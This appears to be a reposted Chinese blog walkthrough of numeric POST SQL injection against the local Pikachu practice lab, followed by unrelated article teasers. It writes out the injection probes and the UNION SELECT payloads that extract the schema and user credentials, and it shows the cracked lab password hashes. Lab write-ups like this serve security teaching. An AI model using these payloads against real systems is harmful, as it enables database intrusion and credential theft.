Pikachu--数字型注入（post）

Pikachu--数字型注入（post）

news2025/6/9 11:00:02

Pikachu--数字型注入（post）

进入页面

输入 127.0.0.1/pikachu 选择sql注入（数字型）

2）打开foxy代理，输入值“1”进行bp抓包

3）将这个获取的包转发到Repeater中

判断注入点

4）用单引号“’”，判断有无注入点，再点击Send获取结果

5）输入id=1 and 1=2 返回结果报错

6）id=1 and 1=1 回显正常，存在注入点，验证了数字型注入。

判断返回字段数

判断返回结果有2列，返回3列报错，说明有2列

查询数据库名

id=1’ union select database(),version()#

得到数据库名为pikachu

获取表名

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#

得到表名有：httpinfo,member,message,users,xssblind

查询字段名

id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users'#

查询字段值

id=1 union select username,password from users#

最后结果

发现密码被md5加密了，我们通过md5在线转换网站（https://www.cmd5.com/）获得

对应账号和MD5加密的密码：

admin：e10adc3949ba59abbe56e057f20f883e（123456）

pikachu：670b14728ad9902aecba32e22fa4f6bd（000000）

test：e99a18c428cb38d5f260853678922e03（abc123）

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1355162.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

光耀未来第一届能源电子产业创新大赛太阳能光伏赛道决赛在宜宾举行

光耀未来第一届能源电子产业创新大赛太阳能光伏赛道决赛在宜宾举行

1月3日，第一届能源电子产业创新大赛太阳能光伏赛道决赛在宜宾盛大举行，本次比赛吸引了全国范围内的光伏行业顶尖人才和创新团队参与。为深入贯彻《关于推动能源电子产业发展的指导意见》，推动我国能源电子产业升级，工业和信息化部…

阅读更多...

每日算法打卡：递归实现组合型枚举 day 4

每日算法打卡：递归实现组合型枚举 day 4

文章目录原题链接题目描述输入格式输出格式数据范围输入样例：输出样例： 题目分析示例代码优化原题链接 93. 递归实现组合型枚举题目难度：简单题目来源：《算法竞赛进阶指南》题目描述从 1∼n 这 n 个整数中随机选出 m 个…

阅读更多...

电动汽车BMS PCB制板的技术分析与可制造性设计

电动汽车BMS PCB制板的技术分析与可制造性设计

随着电动汽车行业的迅猛发展，各大厂商纷纷投入巨资进行技术研发和创新。电动汽车的核心之一在于其电池管理系统（Battery Management System, BMS），而BMS的心脏则是其印刷电路板（PCB）。通过这篇文章探讨电动…

阅读更多...

百度Apollo：激光雷达检测技术深度解析

百度Apollo：激光雷达检测技术深度解析

🎬 鸽芷咕：个人主页 🔥 个人专栏:《linux深造日志》《粉丝福利》 ⛺️生活的理想，就是为了理想的生活! ⛳️ 粉丝福利活动 ✅参与方式：通过连接报名观看课程，即可免费获取精美周边 ⛳️活动链接&#xf…

阅读更多...

prometheus grafana nginx 安装配置和使用

prometheus grafana nginx 安装配置和使用

文章目录前传prometheus exporter容器监控nginxnginx需要加载stub_status监控查看有没有，如果有，去配置下nginx重要，需要重启nginx测试监控是否成功 prometheus中添加nginx-exporter配置 grafana外传前传 prometheus grafana的安装使用&am…

阅读更多...

防爆气象站跟传统气象站相比有哪些优势？

防爆气象站跟传统气象站相比有哪些优势？

防爆气象站是一种特殊的气象站，设计用于在易燃易爆、高温、潮湿等恶劣环境下进行气象监测。以下是防爆气象站的优点： 防爆性能：防爆气象站能够承受极端恶劣的环境条件，可以在易燃易爆、高温、潮湿等危险环境下进行工作&#xff0…

阅读更多...

企业无法处理海量的大文件，FTP不可靠该如何进行替代？

企业无法处理海量的大文件，FTP不可靠该如何进行替代？

FTP是一项标准协议，用于在网络中进行文件传输，最早于1971年问世，被认为是互联网的基石之一。FTP可在不同操作系统和网络环境下实现文件上传和下载，具备方便、迅速和高效的特性，广泛应用于网站建设、软件更新、数据备份…

阅读更多...

Django 8 通用视图基础

Django 8 通用视图基础

1. 什么是通用视图 1. 在terminal 输入 django-admin startapp the_12回车 2. tutorial\settings.py 注册 INSTALLED_APPS [django.contrib.admin,django.contrib.auth,django.contrib.contenttypes,django.contrib.sessions,django.contrib.messages,django.contrib.sta…

阅读更多...

权威外媒聚焦：Messari强调波场TRON在全球加密支付领域的引领作用

权威外媒聚焦：Messari强调波场TRON在全球加密支付领域的引领作用

近日,金融时报、费加罗报及美联社等海外权威媒体就波场TRON 在全球加密支付领域的重要进展发布了相关报道。报道引述加密研究机构Messari 《Crypto Theses for 2024》年度报告,重点强调了波场TRON在推动全球加密货币支付尤其是稳定币USDT应用方面的显著成就。报道提到,波场TR…

阅读更多...

【LeetCode:114. 二叉树展开为链表 | 二叉树 + 递归】

【LeetCode:114. 二叉树展开为链表 | 二叉树 + 递归】

🚀 算法题 🚀 🌲 算法刷题专栏 | 面试必备算法 | 面试高频算法 🍀 🌲 越难的东西,越要努力坚持，因为它具有很高的价值，算法就是这样✨ 🌲 作者简介：硕风和炜，…

阅读更多...

Vue3+Typescript+setup / Vue2使用scrollIntoView（）实现锚点跳转指定列表

Vue3+Typescript+setup / Vue2使用scrollIntoView（）实现锚点跳转指定列表

在标签上添加ref属性来引用DOM元素， Vue2中使用$refs来获取该DOM元素并调用scrollIntoView()方法。使用ref"yearDiv"在每个年份的div元素上添加了一个引用。然后，在yearClick方法中，我们通过this.$refs.yearDiv[year]来获取对应…

阅读更多...

HTML5-新增表单input属性

HTML5-新增表单input属性

新增表单属性 form控件主要新增的属性: autocomplete 是否启用表单的自动完成功能，取值：on（默认）、off novalidate 提交表单时不进行校验，默认会进行表单校验 autocomplete属性概念：autocomplete属性…

阅读更多...

Ontrack EasyRecovery(易恢复中国)2024专业数据文件恢复软件

Ontrack EasyRecovery(易恢复中国)2024专业数据文件恢复软件

Ontrack EasyRecovery(易恢复中国)是全球著名数据厂商Kroll Ontrack出品的一款专业数据文件恢复软件.EasyRecovery数据恢复软件支持恢复不同存储介质数据:硬盘,光盘,U盘/移动硬盘,数码相机,RAID磁盘阵列数据恢复修复等,EasyRecovery中文版可以恢复被删除或丢失的包括文档,表格,…

阅读更多...

nodejs-day1——模块、第三方包管理

nodejs-day1——模块、第三方包管理

自定义模块我们创建的每个JS文件都是一个自定义模块，并且具有模块作用域，也就是在一个模块中创建的变量、常量、函数等等一切，都只能在当前模块中使用优点： 1.共享（导出/暴露）内容给其它模块用&#x…

阅读更多...

rabbitmq延时队列相关配置

rabbitmq延时队列相关配置

确保 RabbitMQ 的延时消息插件已经安装和启用。你可以通过执行以下命令来安装该插件： rabbitmq-plugins enable rabbitmq_delayed_message_exchange 如果提示未安装，以下是安装流程： 查看mq版本： 查看自己使用的 MQ（…

阅读更多...

基于B/S架构的数字孪生智慧监所可视化监管系统

基于B/S架构的数字孪生智慧监所可视化监管系统

1 前言物联网技术的发展使云计算技术得到了迅猛的发展及广泛的应用，智能体系的创建已经成为监狱发展的必然趋势。智慧监狱的创建、智能化管理的推行是监狱管理的创新，也是监狱整体工作水平提升的具体体现。 1.1 建设背景近年来，司法部不…

阅读更多...

数字孪生与边缘计算的结合

数字孪生与边缘计算的结合

数字孪生与边缘计算的结合可以在物理实体附近进行实时数据处理和决策，从而提高响应速度、降低延迟，并有效地利用边缘资源。以下是数字孪生在边缘计算中的一些应用，希望对大家有所帮助。北京木奇移动技术有限公司，专业的软件外包开…

阅读更多...

天津最新web前端培训班如何提升web技能？

天津最新web前端培训班如何提升web技能？

随着互联网的迅猛发展，web前端成为了一个热门的职业方向。越来越多的人希望能够通过学习web前端技术来提升自己的就业竞争力。为了满足市场的需求，许多培训机构纷纷推出了web前端培训课程。什么是WEB前端 web前端就是web给用户展示的东西，…

阅读更多...

sqlserver把Long类型的时间转换为可视化的时间

sqlserver把Long类型的时间转换为可视化的时间

SqlServer 把Long类型日期还原yyyy-MM-dd HH:mm:ss格式日期： SELECT CONVERT(DATETIME, Dateadd(second, 1704330940847 / 1000, 19700101 08:00), 111) AS tt SqlServer 把Long类型日期还原yyyy-MM-dd格式日期： SqlServer中，按照UTC计算标准…

阅读更多...

MATLAB对数据的处理（导入，异常处理）

MATLAB对数据的处理（导入，异常处理）

MATLAB对数据的处理文章目录 MATLAB对数据的处理1、MATLAB导入数据导入的范围导入类型 2、MATLAB处理缺失值和异常值 1、MATLAB导入数据最常用的就是导入excel表格数据，主页选项卡-导入数据-选择excel文件。导入的范围导入数据的范围默认是从第二行开始的&am…

阅读更多...

推荐文章

最新文章